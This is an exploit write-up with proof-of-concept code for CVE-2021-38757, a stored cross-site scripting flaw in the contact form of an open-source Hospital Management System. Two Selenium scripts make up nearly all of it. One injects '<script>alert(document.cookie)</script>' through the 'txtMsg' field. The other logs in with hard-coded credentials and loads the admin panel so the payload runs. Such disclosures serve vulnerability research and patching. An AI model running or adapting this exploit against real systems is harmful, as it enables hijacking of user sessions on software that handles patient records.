# Exploit Title: XSS-Stored PHPSESSID user PWNED on Hospital Management System Vulnerable parameter "txtMsg" on contact
# Author: nu11secur1ty
# Testing and Debugging: nu11secur1ty
# Date: 08.17.2021
# Vendor: https://github.com/kishan0725/Hospital-Management-System
# Link: https://github.com/kishan0725/Hospital-Management-System
# CVE: CVE-2021-38757
[+] Exploit Source:
### P0C
#!/usr/bin/python3
# Author: @nu11secur1ty
# Debug and Developement: @nu11secur1ty
# CVE-2021-38757
from selenium import webdriver
import time
import os
#enter the link to the website you want to automate login.
website_link="
http://192.168.1.3/Hospital-Management-System-master/contact.html"
browser = webdriver.Chrome()
browser.get((website_link))
try:
## The Exploit
browser.execute_script("document.querySelector('[name=\"txtName\"]').value=\"User\"")
browser.execute_script("document.querySelector('[name=\"txtEmail\"]').value=\"
taratora@abv.bg\"")
browser.execute_script("document.querySelector('[name=\"txtPhone\"]').value=\"1234567890\"")
browser.execute_script("document.querySelector('[name=\"txtPhone\"]').value=\"1234567890\"")
browser.execute_script("document.querySelector('[name=\"txtMsg\"]').value=\"nu11secur1ty<script>alert(document.cookie)</script>\"")
## submit the exploit
browser.execute_script("document.querySelector('[name=\"btnSubmit\"]').click()")
# Check
os.system("python PoC-CVE-2021-38757-Check.py")
print("The payload for CVE CVE-2021-38757 is deployed...\n")
except Exception:
#### This exception occurs if the element are not found in the webpage.
print("Some error occured :(")
### Ch3ck
#!/usr/bin/python3
# Author: @nu11secur1ty
# Debug and Developement: @nu11secur1ty
# CVE-2021-38757
from selenium import webdriver
import time
#enter the link to the website you want to automate login.
website_link="
http://192.168.1.3/Hospital-Management-System-master/index1.php"
#enter your login username
username="tarator@abv.bg"
#enter your login password
password="password"
#enter the element for username input field
element_for_username="email"
#enter the element for password input field
element_for_password="password2"
#enter the element for submit button
element_for_submit="patsub"
browser = webdriver.Chrome()
browser.get((website_link))
try:
username_element = browser.find_element_by_name(element_for_username)
username_element.send_keys(username)
password_element = browser.find_element_by_name(element_for_password)
password_element.send_keys(password)
signInButton = browser.find_element_by_name(element_for_submit)
signInButton.click()
# Check
time.sleep(3)
browser.maximize_window()
browser.get(("
http://192.168.1.3/Hospital-Management-System-master/admin-panel1.php#"))
print("The payload for CVE CVE-2021-38757 is deployed...\n")
except Exception:
#### This exception occurs if the element are not found in the webpage.
print("Some error occured :(")
----------------------------------------------------------------------------------------
# Reproduce:
https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-38757
# Proof: https://streamable.com/6xue3b
# BR nu11secur1ty